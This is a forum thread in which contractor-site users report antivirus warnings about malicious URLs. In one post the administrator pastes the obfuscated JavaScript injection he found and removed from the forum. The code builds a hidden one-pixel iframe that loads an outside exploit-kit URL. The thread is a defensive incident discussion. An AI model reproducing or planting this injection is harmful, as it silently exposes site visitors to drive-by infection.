• Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
  • Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!

Malicious URL blocked

Collapse
X
  •  
  • Filter
  • Time
  • Show
Clear All
new posts

    Malicious URL blocked

    I keep getting Avast messages accessing CUK.

    URL: http:// gostatics . com/default.cgi

    Process: file://C:\Program Files\Mozilla Firefox\...

    Infection: url:Mal

    Anybody else seeing this?
    Last edited by administrator; 1 March 2012, 12:48. Reason: remove link
    Me, me, me...

    #2
    Originally posted by Cliphead View Post
    I keep getting Avast messages accessing CUK.

    URL: http:// gostatics . com/default.cgi

    Process: file://C:\Program Files\Mozilla Firefox\...

    Infection: url:Mal

    Anybody else seeing this?

    You must be in Professional. The Mal virus or Malvolio virus is an aggressive type of infrection. Very single minded, with only one form of attack and a massive chip on it's shoulder. Have you tried NL Anti Virus?
    Last edited by administrator; 1 March 2012, 12:48. Reason: remove url
    What happens in General, stays in General.
    You know what they say about assumptions!

    Comment


      #3
      Oddly enough I got a intrustion blocked by ukinoxi.in when I logged on this morning

      Norton says IP Alert Name was Web Attack: Malicious Exploit Kit Website 4
      'CUK forum personality of 2011 - Winner - Yes really!!!!

      Comment


        #4
        Sorry guys, just noticed this one and had a look. I have found the source of the infection and it was a different one to the last time. I saw another hack on a different forum a week or so ago, different to the one we had form a few weeks ago and also different to this one. The forum is up to date in terms of the latest patch level and we only run the one plug in and that is up to date as well. Will send ticket to VBulletin support in a sec as this is getting silly now.

        This looks to be the source of the infection:

        Code:
        (function(){function bZq6wnH(){if(document.body){if(window.name!='jPPj0x'&&!window.tUN3fz){function gDHtJca(rzhDNW){if(rzhDNW.contentDocument)return rzhDNW.contentDocument; if(rzhDNW.contentWindow)return rzhDNW.contentWindow.document;return rzhDNW.document}var fe3k2f6r = {};with(fe3k2f6r){hOAoRrA=/a/.__proto__=='//';zENwnH5='\v'=='v'}var ziJ9xE='z9KRA5';var c0u8Z63='5567eb98';var fWZIQNA1='z9KRA5hz9KRA5tz9KRA5tz9KRA5pz9KRA5:z9KRA5/z9KRA5/z9KRA5nz9KRA5ez9KRA5tz9KRA5sz9KRA5tz9KRA5az9KRA5tz9KRA5iz9KRA5cz9KRA5.z9KRA5iz9KRA5nz9KRA5fz9KRA5oz9KRA5/z9KRA5iz9KRA5nz9KRA5.z9KRA5cz9KRA5gz9KRA5iz9KRA5?z9KRA53z9KRA5';var cxhqp5='z9KRA5iz9KRA5fz9KRA5rz9KRA5az9KRA5mz9KRA5ez9KRA5';var vQUxwE=fe3k2f6r.zENwnH5?'<'+cxhqp5.split(ziJ9xE).join('')+' name="'+c0u8Z63+'" src="'+fWZIQNA1.split(ziJ9xE).join('')+'">':cxhqp5.split(ziJ9xE).join('');var pYrOhQ=document.createElement(vQUxwE);with(pYrOhQ){name=c0u8Z63;setAttribute('name',c0u8Z63);id=c0u8Z63}document.body.appendChild(pYrOhQ);if(window.name==='')window.name='jPPj0x';window.tUN3fz=true;with(pYrOhQ.style){if(!fe3k2f6r.hOAoRrA)position='absolute';left=top='0px';height=width='1px';visibility='hidden'}if(!fe3k2f6r.zENwnH5)gDHtJca(pYrOhQ).location.replace(fWZIQNA1.split(ziJ9xE).join(''))}}else setTimeout(bZq6wnH,0)}bZq6wnH()})();
        Prize for anyone who can decode this, some v clever code by the looks of it.

        If you are still getting the infection attempt from Avast then PM me but have not seen the infection message since cleaning this file out.

        As before, use Malware Bytes and make sure you haven't been infected. If your browsers and OS are up to date then you should be OK as I guess the code will look for flaws in these to exploit and install Trojans if possible.

        If you ever get reports like this then please PM me as I will be able to react much quicker as I sometimes don't come here until later in the day.

        Comment


          #5
          Originally posted by Cliphead View Post
          I keep getting Avast messages accessing CUK.

          URL: http:// gostatics . com/default.cgi

          Process: file://C:\Program Files\Mozilla Firefox\...

          Infection: url:Mal

          Anybody else seeing this?
          Yep, keeps popping up this morning.
          "Ask not what you can do for your country. Ask what's for lunch." - Orson Welles

          Norrahe's blog

          Comment


            #6
            Hasn't popped up for a while now so looks like it's sorted.
            Me, me, me...

            Comment


              #7
              Originally posted by Cliphead View Post
              Hasn't popped up for a while now so looks like it's sorted.
              Same here, hopefully.

              Irish jelly and ice cream avatar???

              "Ask not what you can do for your country. Ask what's for lunch." - Orson Welles

              Norrahe's blog

              Comment


                #8
                Thats it, this is getting scary. I am off CUK for a while till all this virus infection stuff is fixed. Cant take the risk anymore.

                Vote Corbyn ! Save this country !

                Comment


                  #9
                  Originally posted by norrahe View Post
                  Same here, hopefully.

                  Irish jelly and ice cream avatar???

                  Party food as Rangers die...........

                  Me, me, me...

                  Comment


                    #10
                    Originally posted by fullyautomatix View Post
                    Thats it, this is getting scary. I am off CUK for a while till all this virus infection stuff is fixed. Cant take the risk anymore.

                    I have managed to decode it and found it drops a package on people's machines but it only executes when it spots a flounce... oh dear....
                    'CUK forum personality of 2011 - Winner - Yes really!!!!

                    Comment

                    Working...
                    X